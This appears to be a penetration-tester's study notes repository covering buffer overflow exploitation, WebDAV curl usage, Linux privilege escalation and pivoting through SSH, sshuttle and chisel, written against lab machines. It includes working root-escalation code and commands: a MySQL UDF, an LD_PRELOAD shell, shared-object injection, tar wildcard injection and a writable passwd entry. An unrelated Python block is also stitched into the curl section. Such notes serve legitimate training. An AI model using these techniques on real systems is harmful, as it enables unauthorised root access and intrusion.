```
├── Buffer Overflows.md
├── Curl.md
├── Linux Privilege Escalation.md
├── Password Dumping and Cracking.md
├── Pivoting.md
├── Reverse Shells.md
├── SNMP Cheatsheet.md
├── SQL injection Manual.md
├── WMIC Cheatsheet.md
├── Windows Registry.md
├── Wordpress Cheatsheet.md
└── cheatsheet_gdb.md
```

---

/Buffer Overflows.md:

# Buffer Overflows

let's try to connect with a simple python client
we can also do this with **nc**

```python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.129.253',1337))
msg = s.recv(2048).decode()
print(msg)
```

now we get the output

```
Welcome to OSCP Vulnerable Server! Enter HELP for help.
```

ok now we need to send **HELP** and see what the output is

```python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.129.253',1337))
msg = s.recv(2048).decode()   # banner
print(msg)
msg = 'HELP'
s.send(msg.encode('raw_unicode_escape'))
msg = s.recv(2048).decode()   # command list
print(msg)
s.close()
```

we get the output

```
Welcome to OSCP Vulnerable Server! Enter HELP for help.
Valid Commands:
HELP
OVERFLOW1 [value]
OVERFLOW2 [value]
OVERFLOW3 [value]
OVERFLOW4 [value]
OVERFLOW5 [value]
OVERFLOW6 [value]
OVERFLOW7 [value]
OVERFLOW8 [value]
OVERFLOW9 [value]
OVERFLOW10 [value]
EXIT
```

---

## Fuzzing Template

i am a fan of boofuzz (no offense to spike or sulley)
this template can be used to fuzz instantly

change the IP address, port and the OVERFLOW1 prefix according to your application
```python
from boofuzz import *

# target IP and port; newer boofuzz releases replace SocketConnection with TCPSocketConnection(host, port)
session = Session(target=Target(connection=SocketConnection('192.168.0.10',31337,proto='tcp')))
s_initialize("FUZZ")
s_static("OVERFLOW1 ")   # fixed command prefix, never mutated
s_string("AAAA")         # the argument that gets fuzzed
session.connect(s_get("FUZZ"))
session.fuzz()
```

---

## Pattern Generation

Using **msf-pattern_create**
```
$ /usr/bin/msf-pattern_create -l 20
Aa0Aa1Aa2Aa3Aa4Aa5Aa
```

Finding the offset using **msf-pattern_offset**
```
$ /usr/bin/msf-pattern_offset -q Aa3A
[*] Exact match at offset 9
```

Using an online website
```
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
```

I also made a pattern_generator.py
simple but efficient at searching for bytes of any length

```python
import random

# alphabet of 62 characters: A-Z, a-z, 0-9
data = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\
'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\
'1','2','3','4','5','6','7','8','9','0']

length = int(input("enter length of the pattern size "))
pattern = ''
for i in range(length):
    pattern += data[random.randint(0,61)]   # random pick, so a substring can occur more than once

#print("pattern generated")
print(pattern)
item = input("enter string to find offset ")
#index1 = pattern.find(item)
indexes = []
item_length = len(item)
for i in range(0,len(pattern)):
    temp = pattern[i:i+item_length]
    if temp == item:
        indexes.append(i)
for every in indexes:    # print every position where the string occurs
    print(every)
```

---

## Bad Character Detection

generate all bytes using mona
```
!mona bytearray -b "\x00"
```

generate using python
```python
# prints \x01 .. \xff as one escaped string; \x00 is left out because it is almost always a bad byte
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
```

comparing the bytes at esp with the file
```
!mona compare -f c:\mona\program\bytearray.bin -a esp_address
```

---

## Finding JMP REGISTER

using mona
```
!mona jmp -r register -cpb "\x00\x0a\x0d"

!mona jmp -r esp -cpb "\x00\x0a\x0d"
```

using Immunity Debugger
```
Right click on CPU Pane > Search for > All commands in All Modules

Enter JMP ESP
```

---

## Setting a Breakpoint at the eip address

do this and debug when your shellcode does not execute

```
Right click on CPU Pane > Go to > Expression > put jmp esp address > Toggle Breakpoint
```

click the next button right next to the run button

---

## Alternatives to JMP ESP

when there is no jmp esp, we can try these alternatives

**CALL ESP**
```
This is similar to jmp esp
```

**PUSH RET**
```
PUSH esp
RET

the first instruction pushes the esp address on to the stack
RET takes the top of the stack, that is the address in esp, and places it in eip
```

---

## Tackling NULL Bytes
if there are some junk or null bytes after eip and before esp
like less than 8 bytes

**POP POP RET**
the first pop operation takes the content at esp and puts it in a register
another pop does the
same
ret will place the esp content into eip
we can search for these
POP reg32
POP reg32
RET

using mona
```
!mona pop pop ret
```

using Immunity
```
Right Click on CPU Pane > Search for > ALL SEQUENCES OF COMMANDS IN ALL MODULES >

POP reg32
POP reg32
RET
```

**SHORT JMP**
we can convert our assembly instructions to opcodes
and write the opcodes at esp instead of an address
go to this website and assemble the instructions
```
https://defuse.ca/online-x86-assembler.htm
```
let's say we want to jump 40 bytes
```
op code is e9 3c 00 00 00
esp = '\x90\x90\x3c\xe9'
```
it will jump 40 bytes down

i wrote a python script, you can choose to jump forward or backward
```python
n = int(input("Enter how many bytes you want to jump :"))
direction = int(input("Enter which direction you want to jump 1.forward 2. backward"))

# eb XX is a short jump with one signed displacement byte, so it reaches
# -128..+127 bytes, counted from the end of the 2-byte instruction itself
if direction == 1:
    print("\\xeb\\x{:02x}".format(n))        # forward: the displacement is n

if direction == 2:
    temp = 256-n                             # backward: -n as an unsigned byte (two's complement)
    print("\\xeb\\x{:02x}".format(temp))
```

There are many ways to escape null or bad bytes
practice and you will find more interesting ways

---

/Curl.md:

# cURL

curl stands for command-line URL
it can be used to get data, post data, move, delete etc.

## GET Request

this is basic getting of the webpage
```
curl https://example.com/webdav
```

## DELETE files

if we have delete access then we can delete a file on webdav

```
curl -X DELETE https://example.com/webdav/file.txt
```

file.txt will be deleted

## PUT or uploading files

we can upload to webdav using a curl PUT request

```
curl -X PUT https://example.com/webdav/test.txt --data-binary @test.txt
```
`--data-binary` sends the file as the request body exactly as it is (plain `-d` strips the newlines out of a file it reads)

## Create folder in WebDAV

```
curl -X MKCOL https://example.com/webdav/newfolder
```

## Uploading file to folder

```
curl -T 'filename' 'https://example.com/webdav/newfolder/'
```

## Authentication

if we have a username and password we can use them in our curl request

```
curl -u 'username:password' https://example.com/webdav --basic

curl -u 'username:password' https://example.com/webdav --digest

curl -u 'username:password' https://example.com/webdav --anyauth
```

## MOVE files

the destination is passed as a header

```
curl -X MOVE -H 'Destination: https://example.com/webdav/newfilename' 'https://example.com/webdav/oldfile'
```

## See Response code
```
curl -X GET https://example.com/webdav -s -o /dev/null -w '%{http_code}'
```
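The pattern_generator.py in Buffer Overflows.md above picks characters at random, so the 4 bytes taken from a register can match more than one offset and the search has to print every hit. The script below is an added example, not the repo's generator: it builds the same cyclic sequence msf-pattern_create produces, in which every 4-byte window is unique within the first 20280 bytes, and resolves either the ASCII bytes or the raw little-endian register value to a single offset, the way msf-pattern_offset does.

```python
"""Cyclic pattern generator and offset finder (msf-pattern_create / msf-pattern_offset style).

Added example for the notes above; it is not the repo's pattern_generator.py.
"""
import string
import struct
from typing import List, Optional

# upper x lower x digit = 26*26*10 = 6760 three-character groups, i.e. 20280 bytes
# before the sequence repeats
MAX_UNIQUE = 26 * 26 * 10 * 3


def cyclic_pattern(length: int) -> str:
    """Return the first `length` bytes of the Aa0Aa1...Zz9 sequence.

    Each (upper, lower, digit) group occurs once, and the three alignments of a
    4-byte window have different character classes in each position, so every
    4-byte window inside the first 20280 bytes is unique: the bytes that land in
    a saved return address map back to exactly one offset.
    """
    if length > MAX_UNIQUE:
        raise ValueError(f"a pattern longer than {MAX_UNIQUE} bytes is no longer unique")
    chunks: List[str] = []
    size = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def all_offsets(pattern: str, needle: str) -> List[int]:
    """Every index at which `needle` occurs in `pattern` (the check the random generator needs)."""
    hits = []
    start = pattern.find(needle)
    while start != -1:
        hits.append(start)
        start = pattern.find(needle, start + 1)
    return hits


def pattern_offset(needle, length: int = MAX_UNIQUE) -> Optional[int]:
    """Offset of `needle` in the cyclic pattern, or None if it does not occur.

    `needle` is either the ASCII characters seen in the register, or the
    register value as an integer (e.g. 0x41336141 read from the debugger),
    which is unpacked little-endian, the byte order it has in memory on x86.
    """
    if isinstance(needle, int):
        needle = struct.pack("<I", needle).decode("ascii")
    hits = all_offsets(cyclic_pattern(length), needle)
    return hits[0] if hits else None


if __name__ == "__main__":
    print(cyclic_pattern(20))            # Aa0Aa1Aa2Aa3Aa4Aa5Aa, as in the msf output above
    print(pattern_offset("Aa3A"))        # 9
    print(pattern_offset(0x41336141))    # 9, same bytes given as the register value
```

Run it directly and it reproduces the `Aa3A` -> offset 9 result shown in the msf-pattern_offset output; `all_offsets` is the uniqueness check the random generator has to rely on, and for the cyclic pattern it returns at most one hit per 4-byte needle.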
---

/Linux Privilege Escalation.md:

# Linux Privilege Escalation

Tags :

## Contents
[MySQL Service as root](#MySQL-Service-as-root)

[Hash Cracking](#Hash-Cracking)

[Tmux Socket Sessions](#Tmux-Socket-Sessions)

[PATH Variable Manipulation](#PATH-Variable-Manipulation)

[Kernel Exploits](#Kernel-Exploits)

[Juicy Files and Directories](#Juicy-Files-and-Directories)

[Writable passwd or shadow](#Writable-passwd-or-shadow)

[Users permissions](#Users-permissions)

[Sudo Vulnerability](#Sudo-Vulnerability)

[LD_PRELOAD env variable](#LD-PRELOAD-env-variable)

[LD_LIBRARY_PATH](#LD_LIBRARY_PATH-env-variable)

[Cap setuid capability](#Cap-setuid-capability)

[Cron Jobs](#Cron-Jobs)

[Tar wildcard injection](#Tar-wildcard-injection)

[Python Module Injection](#Python-Module-Injection)

[Shared Object Injection](#Shared-Object-Injection)

[Nginx Logrotate CVE](#Nginx-Logrotate-CVE)

[Chkrootkit 0.49 CVE](#Chkrootkit-0.49-CVE)

[NFS Root Squashing](#NFS-Root-Squashing)

[Disk Group](#Disk-Group)

[LXD Group](#LXD-Group)

[Docker Group](#Docker-Group)

[Initctl Jobs](#Initctl-Jobs)

## MySQL Service as root

if the mysql service is running as root and we have root credentials then we can execute commands via **User-Defined Functions**

this exploit works for mysql 4.x/5.0
Download [here](https://www.exploit-db.com/download/1518)
save it as raptor_udf2.c

Now compile it into an object and then a shared object
```bash
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

then connect to
mysql
in there we create a new table and load this shared object into that table
we then dump the contents into a raptor_udf2.so inside the plugin directory

```sql
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
```

then we can execute commands as arguments to our function
```sql
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
```

now we have copied bash into tmp and set the s bit on it
so we can run that as root by default
```
/tmp/rootbash -p
```


## Hash Cracking

when a user sets a weak password, it can be cracked with johntheripper
password hashes are found in the **/etc/shadow** file
this file's contents generally cannot be read by a normal user
if a normal user can read this file then we can try to bruteforce the hashes
copy the hash into a file
```
./john --format=sha512crypt -w=rockyou.txt hashfile
```
if the password is in rockyou.txt you will get the password


## Tmux Socket Sessions

tmux can be left open by the root user or any other user
using the ps command we can verify on which socket tmux is running

```
ps -aux | grep tmux
tmux -S /tmp/socket
```
you will get a tmux session


## VNC Sessions

## PATH Variable Manipulation

we have a binary and it executes another binary, but it does not use an absolute path, only a relative one
in that case we can write a fake binary in that directory
if the directory is not writable we can create the fake binary in /tmp and change the PATH variable

here we have the binary and its source code
if we don't have the source code, we can apply
strings on that binary
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main() {

    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");   // bare name: resolved through PATH, not a fixed location
    char user[80];
    fgets(user, 80, f);
    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());
    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);   // also looked up through PATH
    }
}

```

we can see the popen function and that the whoami binary is not a full path
the popen function executes the binary specified and takes that binary's output into a file stream
and the program checks if we are the tom user, then it drops a root shell
let's create a binary in /tmp named whoami

```bash
touch /tmp/whoami
echo "echo tom" > /tmp/whoami
chmod +x /tmp/whoami
```

now we need to change the PATH variable, because by default the rootshell binary takes whoami from /bin

```bash
export PATH=/tmp:$PATH
```

now run the rootshell binary and we get a root shell

## Kernel Exploits

type the uname -a command to retrieve the linux kernel version
you can google this kernel number to find any kernel exploits

we can use tools which will retrieve the kernel number and find kernel exploits that might work
those are

[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh)

[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl)

the second script requires perl to be installed on linux; as most distros come with perl by default we can use this perl script
this perl script is a lot cleaner than the first one


```bash
TCM@debian:~/tools/linux-exploit-suggester$ perl linux-exploit-suggester-2.pl

#############################
  Linux Exploit Suggester 2
#############################

Local Kernel: 2.6.32
Searching 72 exploits...

Possible Exploits
[1] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
   CVE-2016-5195
   Source: http://www.exploit-db.com/exploits/40616
--snip--
```

dirty cow is a famous linux kernel exploit
we can use that
grab it from [here](https://www.exploit-db.com/exploits/40839)

```bash
TCM@debian:~/tools/dirtycow$ gcc -pthread c0w.c -o cow -lcrypt
TCM@debian:~/tools/dirtycow$ ls
c0w.c cow
TCM@debian:~/tools/dirtycow$ ./cow
```

then type passwd
```bash
TCM@debian:~/tools/dirtycow$ passwd
root@debian:/home/user/tools/dirtycow# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
root@debian:/home/user/tools/dirtycow# whoami
root
```

## Juicy Files and Directories

there are some directories you need to look in for any juicy information
```
/opt/
/backup
/var/backup
readable .bash_history
/mnt/
other user's ssh keys
/user/.ssh/id_rsa
webserver's configuration files
/config.php
```

## Writable passwd or shadow

if passwd is writable we can add a new user
```bash
arrow@ideapad:~/tools/privesc$ mkpasswd -m sha512crypt arrow
$6$GQaxR2lccvxiN$MJBxFbqAeuONoioX1sF2SwjmM9Ntf0fa4LkSl86YeVqHRz2QMid.d18e.mzr/ODprEXGrNHE16OSKyE/Yr5UG1
```

copy that hash and paste it at the end of passwd like this
```
arrow:$6$GQaxR2lccvxiN$MJBxFbqAeuONoioX1sF2SwjmM9Ntf0fa4LkSl86YeVqHRz2QMid.d18e.mzr/ODprEXGrNHE16OSKyE/Yr5UG1:0:0:/root:/bin/bash
```


## Users permissions

type `sudo -l` to list the user's permissions
if there is any binary we can run with NOPASSWD, or as root with our own password, we can take advantage of that binary to get a root shell

```bash
sudo -l
(root) NOPASSWD: /usr/bin/find
sudo /usr/bin/find ./ -name myvpn.ovpn -exec /bin/bash -p \;
we get root shell
```

for info on more binaries you can refer to the website called
[GTFOBins](https://gtfobins.github.io/)

## Sudo Vulnerability

after typing sudo -l, if you get something like !root then you can take advantage of this

`(ALL, !root) /bin/bash`

```bash
sudo -u#-1 /bin/bash
will give you a root shell
```

even if in place of /bin/bash you have another binary, you can do the same

## LD_PRELOAD env variable

run sudo -l
`env_reset, env_keep+=LD_PRELOAD`
if you see it preserving the LD_PRELOAD variable, then you can specify your own .so file when running the binary
the ld_preload variable holds .so files that are loaded into memory and run before the actual program runs

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// runs when the shared object is loaded, before main() of the real program
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
in the above code we are unsetting any value for LD_PRELOAD, then setting our user and group id to 0 (root's) and then executing bash

compile this using gcc
`gcc -fPIC -shared -nostartfiles x.c -o x.so`

now point the LD_PRELOAD env variable to our shared object file and then run the binary
that shared object will load and run before our actual program executes
```bash
TCM@debian:~$ sudo LD_PRELOAD=/home/user/x.so /usr/sbin/apache2
root@debian:/home/user#
```

## LD_LIBRARY_PATH env variable

shared objects used by a binary are fetched first from LD_LIBRARY_PATH if it is set to any directory
so we can put our fake shared object file in /tmp and point LD_LIBRARY_PATH to /tmp, and our shared object gets loaded and run


## Cap setuid capability

running linpeas will reveal binaries with this capability
but this command can also reveal them
```
getcap -r / 2>/dev/null
```

if it's python or perl, go to gtfobins and execute to pwn a root shell

## Cron Jobs

`cat /etc/crontab` contains cron jobs
ls /etc/cron* can also contain cron jobs
if you did not see any, run linpeas, it may find them

```bash
TCM@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
```

we have an overwrite.sh script which is run by the root user every minute
and look at the PATH variable: its first entry is /home/user
so we can create a fake overwrite.sh

```bash
echo "id > /tmp/test" > overwrite.sh
chmod +x overwrite.sh
```

after one minute you should see a file test in /tmp with the root user's info
then put a reverse shell in that overwrite.sh and get a root shell


## Tar wildcard injection

the tar binary has an option to back up all files in a directory using the asterisk *
```
cd /home/user
tar czf /tmp/backup.tar.gz *
```

it's backing up all files in /home/user to /tmp
we can create two files with the names
--checkpoint=1 and --checkpoint-action=exec=sh shell.sh
in /home/user
when tar is executed the shell expands * to all the file names, including our checkpoints, and tar reads them as options
when it hits checkpoint 1 it executes the action, which is shell.sh
put a reverse shell in shell.sh
```bash
cd /home/user
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "reverse shell" > shell.sh
```


## Python Module Injection

when there is a python script run by a cron job as root
see what modules it imports
say it imports the os module
and the python script is in, say, /home/arrow
if you can write to that directory then create an os.py file in the same folder as that cronjob script
then put a python reverse shell in it
whenever the cron job executes, its script imports this os.py file and executes it
if that directory is not writable then check the permissions on
```
/usr/lib/python3/os.py
or
/usr/lib/python2/os.py
```

if that's writable then add a reverse shell to that file
```
cd /home/arrow
echo "reverse shell " > os.py
```


## Shared Object Injection

we can find suid binaries using the find command
```
find / -type f -perm -04000 -ls 2>/dev/null
```

in our case it's /usr/local/bin/suid-so
to run functions in a .so file this binary should open it or access it
we can use strace to see what system calls it's using
```bash
TCM@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
```
it's using a .so file from the /home/user/.config directory and its name is libcalc.so
create a file in that directory with that name
put this c code into libcalc.c
```c
#include <stdio.h>
#include <stdlib.h>

// constructor attribute: runs as soon as the library is loaded by the suid binary
static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```

now compile with gcc
`gcc libcalc.c -shared -fPIC -o libcalc.so`

now run that binary
```bash
TCM@debian:~/.config$ gcc libcalc.c -shared -fPIC -o libcalc.so
TCM@debian:~/.config$ /usr/local/bin/suid-so
Calculating something, please wait...
bash-4.1# whoami
root
```


## Nginx Logrotate CVE

this works only when we are www-data and nginx is <=1.6.2
```bash
www-data@debian:/home/user/tools/nginx$ dpkg -l | grep nginx
ii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files
ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version)
```

download this shell script and execute it with /var/log/nginx/error.log as the argument
now we need to wait until logrotate occurs
we can manually trigger this as the root user
or there may be a cronjob triggering it

```bash
./nginxed-root.sh /var/log/nginx/error.log
and in another root shell
invoke-rc.d nginx rotate >/dev/null 2>&1
```
and we get the root shell


## Chkrootkit 0.49 CVE

chkrootkit has a local privesc cve
put a binary named 'update' in /tmp
put a reverse shell in update and chmod +x it

whenever the cron job executes chkrootkit it executes /tmp/update

## NFS Root Squashing

when an nfs share has no_root_squash this means that the root user on the client can access that share with root privileges
type cat /etc/exports on the victim box and you can see /tmp with no_root_squash
```
showmount -e 10.10.121.162
Export list for 10.10.121.162:
/tmp *
```

switch to the root user on kali and
let's mount it at /tmp/share1
```bash
mount -o rw,vers=2 10.10.121.162:/tmp /tmp/share1
```

now
create a binary and put a reverse shell in it
```bash
touch /tmp/share1/shell
echo "reverse shell" > /tmp/share1/shell
chmod +s /tmp/share1/shell
```

now from the victim box, as the low privileged user,
execute /tmp/shell
we get a root shell


## Disk Group

use the id command to see what groups we are in
if we are a member of the disk group we can try to read contents as the root user
we can use debugfs on the corresponding /dev/sda
in my case it's /dev/sda6
generally it's /dev/sda1
```
└─$ debugfs /dev/sda6
debugfs 1.45.5 (07-Jan-2020)
debugfs: cat /home/arrow/flag.txt
u got it
debugfs: cat /root/.ssh/id_rsa
u get the private key
```

## LXD Group


---

/Password Dumping and Cracking.md:

# Password Dumping and Cracking

Tags : #pwdump7

---

/Pivoting.md:

# Pivoting

Tags : #portforwarding #ssh #sshuttle #chisel #metasploit #autoroute #routeadd #socks #socks5 #socks4a

Before starting you need to enable the port forwarding option on your kali linux box, else no method will work

to do that write 1 into the ip_forward file
this enables our kali to act as a router
(the redirect in `sudo echo 1 > file` is done by your own unprivileged shell, so it fails; pipe through `sudo tee` instead)

```
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
```

---

if you want a full explanation with theory, i made these videos on yt

SSH Tunneling
```
https://www.youtube.com/watch?v=2FRn-M7LOj4
```

Pivoting with Metasploit
```
https://www.youtube.com/watch?v=I3N2_arY9Kg
```

Pivoting with Chisel
```
https://www.youtube.com/watch?v=srUUUkcYEwg
```

---

## SSH Tunneling

This method requires ssh login credentials for the victim machine

### Lab Setup

kali linux - 192.168.2.129

machine1 - 192.168.2.128
           192.168.3.128

machine2 - 192.168.3.129


kali linux can ping machine1 but cannot ping machine2
machine1 has another adapter that connects to machine2
machine1 can ping machine2 using that adapter

we can forward the data from our kali to machine3 using ssh


### Local Port Forwarding

we forward our kali's port to machine3

```
$ ssh -L 4444:192.168.3.129:80 msfadmin@192.168.2.128
```

now data coming to our machine's port 4444 will be forwarded through machine2 to machine3's port 80

This is like a one-to-one port connection

kali:4444 -> machine2 -> machine3:80


### Dynamic Port Forwarding with SOCKS

in the previous local port forwarding we can forward from one port to one ip's one port only
but with dynamic port forwarding, machine2 will forward data according to what we send

```
ssh -D 4444 msfadmin@192.168.2.128
```

now we have been forwarded
we need to edit **proxychains4.conf**
with proxychains we throw all our data at port 4444
it will be forwarded to the destination via machine2

add this line at the end
```
socks5 127.0.0.1 4444
```

now you can do an nmap scan on machine3
or any command, but include proxychains before that command

```
$ proxychains nmap -p80 -Pn -sV 192.168.3.129
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:15 EDT
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
Nmap scan report for 192.168.3.129
Host is up (0.0041s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
```

we can see we scanned successfully
you can also see there is a **Strict Chain**
```
[proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK
```
that shows our connection

kali:4444 -> machine2 -> any_machine_it_can_scan

kali:4444 -> machine2 -> machine3:anyport

if you want to open machine3's port 80 in the browser
then go to settings > proxy > put the proxy as 127.0.0.1 4444
choose socks5

**Limitations** : you need ssh credentials or a private key

---

## Sshuttle

sshuttle is very easy to use and it creates a vpn-like network to all the machines machine2 is connected to
it's similar to dynamic port forwarding

sshuttle -r username@machine1 subnettoadd

```
$ sudo sshuttle -r msfadmin@192.168.2.128 192.168.3.1/24
The authenticity of host '192.168.2.128 (192.168.2.128)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.128' (RSA) to the list of known hosts.
msfadmin@192.168.2.128's password:
Traceback (most recent call last):
  File "", line 1, in
  File "assembler.py", line 27, in
  File "sshuttle.helpers", line 97
    except OSError as e:
                  ^
SyntaxError: invalid syntax
c : fatal: c : server died with error code 1
```

in my kali, sshuttle is giving me an error
but on your box it works for sure

**Limitations** : sshuttle will not work on windows boxes, maybe in future it may work
so it's better to use sshuttle in a linux only environment

---

## Chisel

chisel is my favourite because it is cross platform and doesn't require any credentials

chisel has two modes, **client** and **server** modes

on our kali box we use server mode and it keeps listening

machine2 will connect to our chisel server using the chisel binary and then will forward to other machines

download the chisel linux binary for our kali and the corresponding chisel binary for the victim machine

```
https://github.com/jpillora/chisel/releases
```

transfer it to machine2, which we have reverse shell access to

on our kali linux, run as reverse
the reverse option allows an incoming client to open a port on our kali and connect to the destination specified

```
chisel server -p 5555 --reverse
```

on our reverse shell machine1
```
./chisel32 client 192.168.2.129:5555 R:1234:192.168.3.129:80
```

the above command connects to our kali and then
R stands for remote host, or our kali box
and whatever data comes to our box's 1234 port will be redirected to 192.168.3.129
port 80 200 | so go to browser and open 127.0.0.1:1234 201 | you will see webpage of 192.168.3.129 202 | 203 | ``` 204 | $ ./chisel server -p 5555 --reverse 205 | 2021/05/30 23:06:57 server: Reverse tunnelling enabled 206 | 2021/05/30 23:06:57 server: Fingerprint ZHyDUORbA0i2GQhnaHza0PP3AX13BcDkehSnhlIM4is= 207 | 2021/05/30 23:06:57 server: Listening on http://0.0.0.0:5555 208 | 2021/05/30 23:07:42 server: session#1: tun: proxy#R:1234=>192.168.3.129:80: Listening 209 | ``` 210 | 211 | you can see connection 212 | 213 | kali:1234 -> machine1 -> machine2:80 214 | 215 | now this is like one:one port 216 | we can make machine1 act as socks 217 | 218 | on our kali box , like always 219 | ``` 220 | chisel server -p 5555 --reverse 221 | ``` 222 | 223 | on our machine1 224 | ``` 225 | ./chisel32 client 192.168.2.129:5555 R:1234:socks 226 | ``` 227 | 228 | now machine1 acts as socks 229 | we need to edit proxychains4.conf 230 | add this line 231 | ``` 232 | socks5 127.0.0.1 1234 233 | ``` 234 | 235 | now scan 192.168.3.129 with proxychains nmap 236 | ``` 237 | $ proxychains nmap -p80 -Pn -sV 192.168.3.129 238 | [proxychains] config file found: /etc/proxychains4.conf 239 | [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 240 | [proxychains] DLL init: proxychains-ng 4.14 241 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 242 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 23:14 EDT 243 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 244 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 245 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 246 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 247 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 248 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 249 | [proxychains] Strict chain ... 
[proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK
Nmap scan report for 192.168.3.129
Host is up (0.0033s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
```
Now we can use any tool; just put `proxychains` in front of the command.

Now let's add another machine.

**machine3 - 192.168.4.128**

